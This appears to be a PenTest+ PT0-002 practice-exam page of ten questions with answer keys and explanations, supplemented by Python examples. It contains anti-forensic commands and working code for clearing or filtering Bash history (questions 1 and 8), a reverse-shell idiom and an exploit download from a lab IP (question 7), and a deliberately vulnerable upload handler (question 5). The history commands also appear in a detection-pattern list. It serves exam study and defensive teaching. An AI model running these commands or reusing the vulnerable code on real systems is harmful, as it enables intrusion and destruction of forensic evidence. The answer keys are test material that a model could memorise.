CompTIA PT0-002 Exam Dumps & Practice Test Questions

Question 1:

During a security evaluation, a penetration tester successfully accesses a Linux system. After conducting various reconnaissance and post-exploitation activities, the tester executes commands aimed at altering or erasing the Bash command history associated with the compromised session.

What is the main reason behind modifying or clearing the Bash history file in such a scenario?

A. Redirecting the Bash history output to /dev/null
B. Creating a backup copy of the user’s .bash_history file for analysis
C. Erasing evidence by removing entries from the Bash history
D. Generating misleading files to distract investigators

Correct Answer: C

Explanation:

When penetration testers or attackers gain control over a system, one of their priorities during the post-exploitation phase is to avoid detection by system administrators or forensic investigators. A common way to cover tracks is to manipulate the Bash history, which keeps the commands typed in an interactive session in memory and, by default, writes them to the history file when the shell exits. On most Linux systems that file is ~/.bash_history; its location is controlled by the HISTFILE variable.

By clearing or altering this file, attackers can effectively erase evidence of their activity, making it more difficult to reconstruct the sequence of malicious actions or commands that were executed. Several commands are often used to accomplish this:

  • history -c clears the shell’s in-memory command list immediately; on its own it does not remove entries already saved to the file.

  • Truncating the file by redirecting /dev/null into it (cat /dev/null > ~/.bash_history, or simply > ~/.bash_history) erases the saved contents.

  • Unsetting the HISTFILE variable (unset HISTFILE), or pointing it at /dev/null, stops the current shell from writing anything further to disk when it exits; other sessions are unaffected.

Together, these actions hide traces of unauthorized access and make forensic analysis more challenging. The technique is well known, and security teams monitor for it: common controls are marking the history file append-only (chattr +a), shipping each command to a remote syslog or auditd collector as it is executed so the local file is not the only record, and alerting on the commands above or on a history file that is suddenly empty.
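A small detector for the commands listed above, run over constructed log lines. This is an added example, not code from the original page; it assumes a logging setup that records each interactive command to syslog (for instance through a PROMPT_COMMAND hook or an auditd EXECVE rule), and the line format in SAMPLE_LOG is invented for the demo rather than a standard format.

```python
"""Flag shell-history tampering in a stream of command-log lines.

Added example (not from the original page). It assumes a logging setup that
records each interactive command to syslog; the line format below is
constructed for this demo and is not a standard format.
"""
import re

# One (indicator, regex) pair per anti-forensic technique. More specific
# patterns come first so a single command yields one, accurate label.
ANTI_FORENSIC_PATTERNS = [
    ("history_clear", re.compile(r"\bhistory\s+-c\b")),
    ("histfile_unset", re.compile(r"\bunset\s+HISTFILE\b")),
    ("histfile_devnull", re.compile(r"\bHISTFILE=/dev/null\b")),
    ("histsize_zero", re.compile(r"\bHIST(?:FILE)?SIZE=0\b")),
    ("history_delete", re.compile(r"\brm\s+(?:-\S+\s+)*\S*\.bash_history\b")),
    ("history_rewrite", re.compile(r"\b(?:sed\s+-i|grep\s+-v)\b.*\.bash_history\b")),
    # a single '>' (not '>>') aimed at the history file truncates it
    ("history_truncate", re.compile(r"(?<!>)>(?!>)\s*\S*\.bash_history\b")),
]

# Constructed sample: a "bash" logger emitting user, cwd and the exact command.
SAMPLE_LOG = """\
Mar 03 10:15:02 web01 bash[2231]: user=alice pwd=/home/alice cmd="ls -la /var/www"
Mar 03 10:15:40 web01 bash[2231]: user=alice pwd=/home/alice cmd="sudo systemctl restart apache2"
Mar 03 10:16:05 web01 bash[3412]: user=www-data pwd=/tmp cmd="wget 10.10.51.50:9891/exploit"
Mar 03 10:16:09 web01 bash[3412]: user=www-data pwd=/tmp cmd="chmod +x exploit && ./exploit"
Mar 03 10:16:30 web01 bash[3412]: user=www-data pwd=/tmp cmd="history -c"
Mar 03 10:16:31 web01 bash[3412]: user=www-data pwd=/tmp cmd="unset HISTFILE"
Mar 03 10:16:32 web01 bash[3412]: user=www-data pwd=/tmp cmd="cat /dev/null > ~/.bash_history"
Mar 03 10:17:00 web01 bash[2231]: user=alice pwd=/home/alice cmd="history | tail -20"
"""

LOG_RE = re.compile(r'user=(?P<user>\S+) .*?cmd="(?P<cmd>.*)"$')


def scan_log(text):
    """Return (user, indicator, command) for every line matching a pattern.

    Only the first matching indicator per line is reported, so one command that
    both filters and truncates the file produces a single finding.
    """
    findings = []
    for line in text.splitlines():
        m = LOG_RE.search(line)
        if not m:
            continue  # not a command record: skip other syslog lines instead of failing
        cmd = m.group("cmd")
        for name, regex in ANTI_FORENSIC_PATTERNS:
            if regex.search(cmd):
                findings.append((m.group("user"), name, cmd))
                break
    return findings


def users_to_alert(findings, min_hits=2):
    """Users with at least min_hits distinct indicators. One 'history -c' may be
    habit; a clear/unset/truncate sequence inside a minute is not."""
    seen = {}
    for user, name, _ in findings:
        seen.setdefault(user, set()).add(name)
    return sorted(u for u, names in seen.items() if len(names) >= min_hits)


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
    print("alert on:", users_to_alert(scan_log(SAMPLE_LOG)))
```

Reading history (history | tail) is deliberately not flagged; the signal is the clear-unset-truncate sequence from one user, which is why the alert threshold counts distinct indicators rather than raw hits.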

Why the other options are less relevant:

  • A names a technique (pointing the history at /dev/null) rather than a reason. The question asks why the history is modified; the answer is to remove evidence, whichever command achieves it.

  • B describes gathering intelligence by copying the history, which is the opposite of hiding activity.

  • D mentions deception through decoy files, which can be a tactic, but unrelated to Bash history manipulation.

In summary, clearing the Bash history is a classic evasion tactic used by attackers to cover their tracks and avoid forensic detection.

Question 2:

A penetration test that targets compliance objectives is conducted to verify whether a system or network adheres to specific industry regulations and legal requirements. Unlike general security assessments, this type of test focuses on validating that mandated controls and protections are properly implemented and functioning as intended.

What is the primary objective of a compliance-focused penetration test?

A. Extracting Personally Identifiable Information (PII) from protected systems
B. Circumventing security controls on perimeter devices
C. Assessing how effectively a set of prescribed security standards is enforced
D. Retrieving specific confidential data from the network

Correct Answer: C

Explanation:

Compliance-based penetration testing is distinct from broader security testing because its main goal is to evaluate adherence to regulatory frameworks and security standards such as GDPR, HIPAA, PCI DSS, or SOX. Organizations must comply with these standards to protect sensitive information and to keep the legal standing and industry certifications that depend on them.

The test focuses on verifying that the specific security controls, policies, and processes mandated by these regulations are present and effective. This includes checking for encryption, access controls, logging, and vulnerability management measures that the compliance regime demands. The penetration tester’s role is to simulate attacks to confirm whether the controls stand up to real-world threats in a way that satisfies auditors and regulators.

Why the other options are incorrect:

  • A (Extracting PII) is not the main purpose of compliance testing, although protecting such data is an underlying concern. The test verifies that protections are in place, rather than focusing on the actual data extraction.

  • B (Bypassing perimeter protections) is part of many penetration tests but not the specific focus of compliance testing, which is more standards-driven.

  • D (Retrieving data) is a general pen test objective but not uniquely tied to compliance assessments.

Ultimately, the main concern of compliance-based penetration testing is determining whether an organization’s security posture complies with established regulations and if the controls are functioning as intended to reduce risk and protect sensitive data. This ensures both regulatory compliance and better overall security hygiene.

Question 3:

The MITRE ATT&CK framework offers a comprehensive, organized method for understanding how cyber attackers carry out their operations within IT systems. It helps security teams identify the adversaries’ tactics, techniques, and procedures (TTPs), enabling more effective anticipation and defense against attacks.

When describing the benefits of the MITRE ATT&CK framework to a company’s chief legal officer, which of the following points would be the most important to emphasize?

A. Gaining insight into attack tactics aids in disrupting those attacks.
B. Prebuilt scripts from the framework can be directly integrated into SIEM systems.
C. The framework helps in more accurately calculating incident costs.
D. The framework is unchanging, ensuring a stable security program over time.

Correct Answer: A

Explanation:

The MITRE ATT&CK framework is a widely adopted, freely available knowledge base that catalogs the behaviors and methods adversaries use during cyber intrusions. It organizes these actions into tactics (the adversary’s goal at each stage) and techniques (how that goal is achieved), giving defenders a structured way to understand how attacks unfold.

When communicating the value of this framework to a chief legal counsel—who may not be deeply technical—it’s crucial to focus on how ATT&CK helps the organization anticipate and disrupt attacks. By understanding the specific tactics attackers use, security teams can design detection and mitigation strategies that intercept intrusions earlier, potentially preventing data breaches or reducing their impact. This proactive threat intelligence is the most relevant and compelling benefit for legal counsel because it directly supports risk reduction and regulatory compliance efforts.

Looking at the other options:

  • B is technical and relates to how security tools might implement ATT&CK-based detections, but this detail is less meaningful to legal personnel.

  • C is incorrect because while ATT&CK can improve understanding of an attack, it is not designed to calculate financial damages—this is better suited to risk management or financial modeling.

  • D is inaccurate since ATT&CK is regularly updated to reflect new attack techniques, making it a dynamic and evolving resource, not static.

In summary, the key advantage of the MITRE ATT&CK framework is that it helps organizations identify and disrupt attacker behavior early by providing a clear, actionable map of adversary tactics. This benefit is vital for improving defenses and managing cybersecurity risk effectively, making it the most appropriate point to highlight to legal counsel.

Question 4:

The OWASP Top 10 is a renowned publication from the Open Web Application Security Project that lists the leading security vulnerabilities affecting web applications. This list assists organizations in recognizing common threats and focusing remediation efforts.

Which two statements best describe the OWASP Top 10? (Choose two.)

A. It identifies the most critical risks to web applications.
B. It lists every possible risk faced by web applications.
C. It presents risks in an order reflecting their importance.
D. It serves as an official web application security standard.
E. It functions as a framework for risk governance and compliance.
F. It is a checklist of vulnerabilities specific to Apache servers.

Correct Answers: A and C

Explanation:

The OWASP Top 10 is a globally recognized and influential list designed to highlight the most significant security risks to web applications. Published and regularly updated by the Open Web Application Security Project, it serves as a foundational awareness document for developers, security professionals, and organizations working to improve application security.

Option A is correct because the OWASP Top 10 focuses on the most critical and common vulnerabilities—such as SQL injection, cross-site scripting (XSS), and broken access controls—that pose the greatest risk to web apps worldwide. These risks are selected based on data about their prevalence and impact, making the list a prioritized guide rather than a comprehensive catalog.

Option C is also correct because the OWASP Top 10 tends to rank these vulnerabilities by their relative importance or risk level, considering factors such as exploitability and damage potential. Although it’s not an exact severity ranking, the list helps organizations understand which issues require urgent attention.

The incorrect options:

  • B is wrong because the OWASP Top 10 does not cover all vulnerabilities—it highlights only the most critical.

  • D is incorrect since the OWASP Top 10 is not a formal security standard like PCI DSS or ISO 27001, but rather a guideline for awareness and education.

  • E is false because OWASP Top 10 does not provide a governance or compliance framework but may assist compliance efforts.

  • F is wrong as the list applies broadly to web applications regardless of the underlying web server or platform and is not specific to Apache.

In conclusion, the OWASP Top 10 is a prioritized list of the most significant web application security risks, helping organizations focus their resources on the vulnerabilities that matter most.

Question 5:

A penetration tester discovers a directory traversal vulnerability that allows unauthorized file uploads to certain server paths. Sensitive files such as configuration scripts are accessible through this flaw. 

Which approach would best enable an attacker to exploit this vulnerability and gain internal access to the compromised system?

A. Modify one of the accessible files by adding a line of code that initiates a remote callback.
B. Download Perl (.pl) files and search for embedded usernames and passwords.
C. Alter the smb.conf configuration file and upload it back to the server.
D. Download the smb.conf file and review its configuration settings.

Correct Answer: A

Explanation:

In this scenario, the penetration tester has found a directory traversal vulnerability combined with unauthorized file upload capabilities. This combination allows an attacker to potentially place or modify files on the target server. The most direct and effective way to exploit this is by injecting code into an accessible file that enables the attacker to gain a foothold inside the system.

Option A is the best choice because modifying an accessible script (a .php or .pl file the server executes on request) to add a line that opens a reverse shell or other callback makes the server connect out to the attacker the next time the script runs. Because the connection originates from inside the network, it usually passes egress rules that would block an inbound connection, giving the attacker interactive access and control.

Other options are less effective or indirect:

  • Option B involves downloading Perl scripts to manually extract credentials. While this may eventually help, it requires further steps and does not immediately provide system access.

  • Option C assumes the attacker can modify and upload smb.conf, the configuration file for Samba (SMB file sharing on Unix-like hosts). That requires the server to be running Samba, the upload to land where the service reads its configuration, and a service reload before the change takes effect, which is less likely and slower than a callback from a script the server already executes on request.

  • Option D is purely passive—just reviewing a configuration file does not grant access. Without modification or additional exploits, this is not a path to immediate internal access.

Therefore, the most efficient exploitation method is to alter an accessible script with a remote callback, allowing attackers to control the server remotely and bypass network restrictions. This approach leverages the vulnerability for immediate internal system compromise.
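The flaw behind this question, shown as an added example rather than code from the original page: an upload handler that joins the client-supplied name onto the upload directory, beside a hardened version. The directory layout (uploads/ next to cgi-bin/status.pl), the file names and the payload line are constructed for the demo; PAYLOAD is a harmless comment standing in for the "single line of code" the explanation mentions.

```python
"""Upload-path handling: the traversal the question describes, beside a hardened form.

Added example, not code from the original page. Layout, names and payload are
constructed for the demo.
"""
import os
import tempfile

ALLOWED_SUFFIXES = {".png", ".jpg", ".pdf"}
PAYLOAD = b"# attacker-controlled line appended through the upload handler\n"


def save_upload_vulnerable(root, filename, data):
    """Trusts the client-supplied name. '../cgi-bin/status.pl' walks out of root
    and appends to a script the server will later execute."""
    dest = os.path.join(root, filename)
    with open(dest, "ab") as f:   # append: the script keeps working, the extra line runs too
        f.write(data)
    return os.path.realpath(dest)


class UploadRejected(ValueError):
    pass


def save_upload_hardened(root, filename, data):
    """Resolve the final path (symlinks included) and require it to stay under
    root; then allow-list the type and create the file without overwriting."""
    root_real = os.path.realpath(root)
    dest = os.path.realpath(os.path.join(root_real, filename.replace("\\", "/")))
    if os.path.commonpath([root_real, dest]) != root_real:
        raise UploadRejected("path escapes upload root")
    name = os.path.basename(dest)
    if not name or name.startswith("."):
        raise UploadRejected("hidden or empty filename")
    if os.path.splitext(name)[1].lower() not in ALLOWED_SUFFIXES:
        raise UploadRejected("disallowed file type")
    # O_EXCL: fail rather than overwrite an existing file or follow a planted symlink.
    fd = os.open(dest, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o600)
    with os.fdopen(fd, "wb") as f:
        f.write(data)
    return dest


def demo():
    """Run both handlers against a throwaway tree and report what happened."""
    with tempfile.TemporaryDirectory() as tmp:
        root = os.path.join(tmp, "uploads")
        cgi = os.path.join(tmp, "cgi-bin")
        os.makedirs(root)
        os.makedirs(cgi)
        script = os.path.join(cgi, "status.pl")
        with open(script, "wb") as f:
            f.write(b'#!/usr/bin/perl\nprint "ok\\n";\n')

        traversal = "../cgi-bin/status.pl"
        save_upload_vulnerable(root, traversal, PAYLOAD)
        with open(script, "rb") as f:
            results = {"vulnerable_modified_script": PAYLOAD in f.read()}

        for name in (traversal, "shell.pl", "report.pdf"):
            try:
                save_upload_hardened(root, name, b"%PDF-1.4 constructed sample\n")
                results[name] = "saved"
            except UploadRejected as exc:
                results[name] = str(exc)
        return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The order of the checks matters: the containment test on the resolved path runs before anything looks at the name, so a traversal is rejected even when the basename would otherwise be acceptable, and the extension allow-list stops a script from being planted inside the upload root itself.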

Question 6:

A company has received authorization from its cloud provider to perform a vulnerability scan on its cloud-hosted data infrastructure. 

To effectively assess security risks, what should the penetration tester verify first to evaluate the risk to sensitive hosted data?

A. Whether sensitive client data is publicly accessible.
B. Whether the communication between the cloud and the client is secure.
C. Whether the client’s employees are adequately trained to use the platform.
D. Whether the cloud applications were developed following a secure Software Development Lifecycle (SDLC).

Correct Answer: A

Explanation:

When assessing security in cloud environments, the foremost priority is to ensure that sensitive data is not exposed to the public or unauthorized users. This is a foundational step in protecting data confidentiality and preventing breaches.

Option A is correct because it directly addresses the risk of inadvertent data exposure, which is a common and critical vulnerability in cloud setups. Publicly accessible data—such as misconfigured Amazon S3 buckets or open database endpoints—can lead to immediate and serious data breaches. Therefore, verifying whether sensitive client data is accessible without proper permissions should always be the initial focus of any cloud security assessment.

While other options are important components of a comprehensive security posture, they are secondary in the order of risk management:

  • Option B relates to securing data in transit (e.g., using TLS encryption). This is crucial but assumes the data is already protected from exposure. If data is publicly accessible, encryption alone cannot prevent leaks.

  • Option C concerns employee training. Although essential for operational security, this is a procedural measure and not the first step in vulnerability scanning or technical risk assessment.

  • Option D involves verifying secure development practices through SDLC. While this helps prevent software vulnerabilities, it is more relevant after confirming data exposure risks are managed.

In summary, identifying whether sensitive client data is publicly exposed is the highest priority for vulnerability scanning in cloud environments. It provides the most direct insight into potential data breaches and guides remediation efforts effectively before moving on to securing communication channels, personnel training, or development practices.

Question 7:

During a penetration test, an attacker started a simple HTTP server on a staging machine using Python, which serves files from the current directory on port 9891. The tester now wants to download a file called "exploit" from this server onto a target machine and run it.

Which command should the tester use on the target machine to download the "exploit" file from the HTTP server?

A. nc 10.10.51.50 9891 < exploit
B. powershell -exec bypass -f \\10.10.51.50\9891
C. bash -i >& /dev/tcp/10.10.51.50/9891 0&1/exploit
D. wget 10.10.51.50:9891/exploit

Correct answer: D

Explanation:

In penetration testing, starting a simple HTTP server with Python (e.g., python -m http.server 9891) allows serving files over HTTP from the current directory. Here, the tester wants to download a file named exploit hosted on this server to the target machine for execution.

Let’s analyze each option:

  • Option A: nc 10.10.51.50 9891 < exploit
    Netcat (nc) is a versatile networking tool, often used to transfer data or establish reverse shells. Here, though, the input redirection sends a local file named exploit from the target into the connection, the opposite of downloading, and netcat does not speak HTTP, so the Python server would answer with an error rather than the file.

  • Option B: powershell -exec bypass -f \\10.10.51.50\9891
    This PowerShell command points at \\10.10.51.50\9891, a UNC path to an SMB share, not an HTTP URL, and -f (for -File) expects a script path. Nothing here talks HTTP to port 9891, so it cannot fetch the file from the Python server.

  • Option C: bash -i >& /dev/tcp/10.10.51.50/9891 0&1/exploit
    This resembles the Bash /dev/tcp reverse-shell idiom (normally bash -i >& /dev/tcp/HOST/PORT 0>&1), but the trailing 0&1/exploit is malformed, and even the correct form opens an interactive shell over a raw TCP socket rather than downloading a file.

  • Option D: wget 10.10.51.50:9891/exploit
    wget is a command-line tool that downloads over HTTP, HTTPS, or FTP and assumes http:// when no scheme is given, so this fetches http://10.10.51.50:9891/exploit and saves it as exploit in the current directory. The downloaded file is not executable until the tester runs chmod +x exploit; curl -O http://10.10.51.50:9891/exploit is the equivalent when wget is not installed on the target.

In summary, Option D is the simplest and most appropriate command for downloading a file from a Python HTTP server during a penetration test.
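The staging-server and download exchange end to end, as an added example that is not part of the original page. It reproduces on loopback what `python -m http.server 9891` on the staging host and `wget 10.10.51.50:9891/exploit` on the target do, and adds the SHA-256 comparison neither command performs, so that a file altered in transit or swapped on the staging box is never executed. The loopback address, the OS-assigned port and the file contents are constructed for the demo; no real exploit is involved.

```python
"""Serve a staging directory and fetch a file from it, with an integrity check.

Added example, not from the original page. Address, port and file contents are
constructed for the demo.
"""
import hashlib
import os
import tempfile
import threading
import urllib.request
from functools import partial
from http.server import SimpleHTTPRequestHandler, ThreadingHTTPServer


class QuietHandler(SimpleHTTPRequestHandler):
    def log_message(self, *args):  # keep the demo output clean
        pass


def serve_directory(directory, host="127.0.0.1"):
    """Same behaviour as `python -m http.server` (GET serves files from a directory),
    bound to loopback on an OS-assigned port. Returns (server, port)."""
    server = ThreadingHTTPServer((host, 0), partial(QuietHandler, directory=directory))
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, server.server_address[1]


def fetch_and_verify(url, dest, expected_sha256):
    """What `wget URL` does, plus: refuse to save anything whose SHA-256 does not
    match what the tester staged, and mark the result executable (wget does not)."""
    with urllib.request.urlopen(url, timeout=5) as resp:
        data = resp.read()
    digest = hashlib.sha256(data).hexdigest()
    if digest != expected_sha256:
        raise ValueError(f"sha256 mismatch: expected {expected_sha256}, got {digest}")
    with open(dest, "wb") as f:
        f.write(data)
    os.chmod(dest, 0o700)
    return digest


def demo():
    payload = b"#!/bin/sh\necho 'constructed stand-in for the exploit file'\n"
    expected = hashlib.sha256(payload).hexdigest()   # computed on the staging side
    with tempfile.TemporaryDirectory() as staging, tempfile.TemporaryDirectory() as target:
        with open(os.path.join(staging, "exploit"), "wb") as f:
            f.write(payload)
        server, port = serve_directory(staging)
        try:
            url = f"http://127.0.0.1:{port}/exploit"   # same shape as 10.10.51.50:9891/exploit
            dest = os.path.join(target, "exploit")
            digest = fetch_and_verify(url, dest, expected)
            with open(dest, "rb") as f:
                round_trip = f.read() == payload
            executable = os.access(dest, os.X_OK)
            try:   # a wrong expected hash must leave nothing on disk
                fetch_and_verify(url, dest + ".bad", "0" * 64)
                tampered_rejected = False
            except ValueError:
                tampered_rejected = not os.path.exists(dest + ".bad")
        finally:
            server.shutdown()
            server.server_close()
    return {"verified": digest == expected, "round_trip": round_trip,
            "executable": executable, "tampered_rejected": tampered_rejected}


if __name__ == "__main__":
    print(demo())
```

In an engagement the expected digest is recorded on the staging host (sha256sum exploit) before the transfer; comparing it on the target is what turns "the download succeeded" into "the right file arrived".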

Question 8:

After successfully exploiting a target system, a penetration tester wants to clean up the system to erase evidence of their activities, especially commands related to the exploit named "apache."

Which of the following commands is best suited to remove traces of “apache” commands from the user’s shell history?

A. grep -v apache ~/.bash_history > ~/.bash_history
B. rm -rf /tmp/apache
C. chmod 600 /tmp/apache
D. taskkill /IM apache /F

Correct answer: A

Explanation:

Post-exploitation cleanup is a critical step for penetration testers to avoid detection. One common way to cover tracks is by editing or clearing the shell command history, so commands used during exploitation do not remain visible to system administrators.

Let’s examine each option:

  • Option A: grep -v apache ~/.bash_history > ~/.bash_history
    This command is meant to drop every line containing the string "apache" from the user’s Bash history: grep -v (invert match) prints only the lines that do not match, and the output is redirected back into .bash_history. It is the only option that touches the command history at all, which is what the question is testing. Two practical caveats: the shell opens the output redirection before grep starts, so writing back to the same file truncates it first and grep reads an empty file, leaving an empty history rather than a filtered one (write to a temporary file and move it into place, or use sed -i '/apache/d' ~/.bash_history). And the running shell still holds the session’s commands in memory and writes them out on exit, so history -c is needed as well.

  • Option B: rm -rf /tmp/apache
    This deletes a directory or file named apache in /tmp. Although deleting exploit files or temporary directories can be useful, it doesn’t erase command history or logs, so it’s less effective for covering tracks.

  • Option C: chmod 600 /tmp/apache
    This changes file permissions to make /tmp/apache readable and writable only by the owner. While it limits access, it doesn’t delete evidence or history and is not typically part of post-exploitation cleanup.

  • Option D: taskkill /IM apache /F
    This Windows command forcibly terminates the Apache process. While useful for stopping services, it does not remove any traces of the attacker’s commands or presence on the system.

Therefore, Option A is the best choice because cleaning the shell history is a direct and effective method to erase traces of exploitation activities.
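The truncation pitfall in Option A, reproduced step for step, beside a rewrite that actually filters. This is an added example, not code from the original page; SAMPLE_HISTORY is constructed for the demo. naive_shell_style_filter() performs the same sequence of operations the shell does for `grep -v apache ~/.bash_history > ~/.bash_history` (open the output for writing first, then read), and scrub_history() is the correct in-place rewrite.

```python
"""Scrub one pattern from a history file without the truncation pitfall.

Added example, not code from the original page. SAMPLE_HISTORY is constructed.
"""
import os
import re
import tempfile

SAMPLE_HISTORY = """\
ls -la
cd /tmp
wget 10.10.51.50:9891/apache
chmod +x apache
./apache -t 10.10.51.60
sudo systemctl status apache2
cat /etc/passwd
"""


def naive_shell_style_filter(path, pattern):
    """The shell sets up `> FILE` (open for write, truncate) before it starts
    grep, so grep then reads an already-empty file and writes nothing back."""
    regex = re.compile(pattern)
    with open(path, "w") as dst:          # 1. redirection: FILE is truncated here
        with open(path) as src:           # 2. grep opens FILE: it is empty now
            kept = [line for line in src if not regex.search(line)]
        dst.writelines(kept)              # 3. nothing left to write
    return len(kept)


def scrub_history(path, pattern):
    """Write the filtered lines to a temp file in the same directory, keep the
    original mode bits, then replace atomically. Returns the number of lines removed."""
    regex = re.compile(pattern)
    mode = os.stat(path).st_mode & 0o777
    fd, tmp = tempfile.mkstemp(dir=os.path.dirname(os.path.abspath(path)), prefix=".hist-")
    removed = 0
    with os.fdopen(fd, "w") as dst, open(path) as src:
        for line in src:
            if regex.search(line):
                removed += 1
            else:
                dst.write(line)
    os.chmod(tmp, mode)
    os.replace(tmp, path)   # one rename: no window in which the file is half-written
    return removed


def demo():
    with tempfile.TemporaryDirectory() as d:
        naive, proper = os.path.join(d, "naive"), os.path.join(d, "proper")
        for p in (naive, proper):
            with open(p, "w") as f:
                f.write(SAMPLE_HISTORY)
        naive_shell_style_filter(naive, "apache")
        removed = scrub_history(proper, "apache")
        with open(naive) as f:
            naive_lines = f.read().splitlines()
        with open(proper) as f:
            proper_lines = f.read().splitlines()
    return {"naive_lines": naive_lines, "removed": removed, "proper_lines": proper_lines}


if __name__ == "__main__":
    print(demo())
```

Note what the correct rewrite does to the legitimate "sudo systemctl status apache2" line: it disappears too, and a history with gaps where an administrator expects routine commands is itself a finding for a reviewer. Neither function touches the shell’s in-memory list, which Bash writes back on exit; history -c (or history -d N for a single entry) covers that part.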

Question 9:

Following a static application security testing (SAST) process, a penetration tester must prepare a report for application developers. The report should clearly highlight vulnerabilities so developers can effectively remediate them. 

What is the most critical element to include in this report aimed at developers?

A. A high-level summary of the penetration-testing techniques used
B. A detailed bill of materials including supplies, subcontractor details, and costs related to the assessment
C. Quantitative evaluations of the potential impact if the software were compromised
D. Specific code excerpts showing unsafe typecasting vulnerabilities with relevant context

Correct Answer: D

Explanation:

When performing a Static Application Security Test (SAST), the main objective is to identify security weaknesses within the application’s source code before deployment. The final report produced from this analysis is primarily meant for the development team because they are responsible for correcting the security flaws. Consequently, the report should emphasize clear, actionable, and technical details that enable developers to understand and fix vulnerabilities efficiently.

Looking at each option:

  • A: An executive summary detailing penetration-testing methods is often useful for high-level stakeholders or managers but offers limited value to developers. Developers require precise, technical insights rather than a general overview of how the tests were conducted.

  • B: Including a bill of materials with costs and subcontractor information is irrelevant to security remediation and is more appropriate for financial or procurement departments rather than a developer-focused security report.

  • C: While understanding the potential impact of vulnerabilities can help prioritize fixes, developers need specific information about the vulnerabilities themselves, not just business risk assessments. Without concrete technical context, developers cannot effectively remediate issues.

  • D: Providing the code context, especially highlighting problematic areas such as unsafe typecasting, is critical. Unsafe typecasting can introduce severe risks like buffer overflows, memory corruption, or unexpected behavior, which are often difficult to identify without seeing the exact code snippets. This contextual information allows developers to grasp the nature of the issue quickly and implement targeted fixes.

In summary, the most valuable part of a SAST report for developers is detailed code-level context that pinpoints vulnerabilities like unsafe typecasting. This enables developers to understand and address the issues effectively, ensuring the security of the software.

Question 10:

A penetration tester is conducting a network vulnerability assessment and discovers several outdated services running on target machines. 

Which of the following is the best next step to further identify exploitable weaknesses related to these services?

A. Execute credentialed scans to gather more detailed information
B. Run passive reconnaissance to avoid detection
C. Perform exploitation of known vulnerabilities immediately
D. Document the findings and report to the client

Correct Answer: A

Explanation:

In the context of penetration testing, once outdated services are identified during a network vulnerability assessment, the next logical step is to conduct credentialed scans. Credentialed scans involve using authorized access credentials to log into the target systems and perform a deeper inspection of the services and configurations.

Why is this important? Credentialed scans provide more detailed and accurate information about the system’s vulnerabilities because they allow access to internal configurations, patch levels, and system settings that non-credentialed scans cannot see. This helps to identify exploitable weaknesses that may not be apparent from an external perspective.

Choosing to run passive reconnaissance (option B) limits detection risk but provides minimal information, which is less effective once outdated services have been found. Passive reconnaissance is typically a first step to gather information without alerting the target but is insufficient for deep vulnerability analysis.

Performing exploitation immediately (option C) is risky without a full understanding of the target system. Exploiting vulnerabilities without a thorough analysis can cause unintended damage or service interruptions, and also violates the rules of engagement if not properly authorized.

Documenting and reporting (option D) is an important part of the testing process but should come after the tester has gathered sufficient evidence and verified vulnerabilities through further investigation.

In summary, after identifying outdated services, executing credentialed scans is the best way to deepen the assessment, validate vulnerabilities, and prepare for safe, effective exploitation within the rules of engagement. This method ensures that the penetration tester collects comprehensive data necessary to produce an actionable and accurate report for remediation.

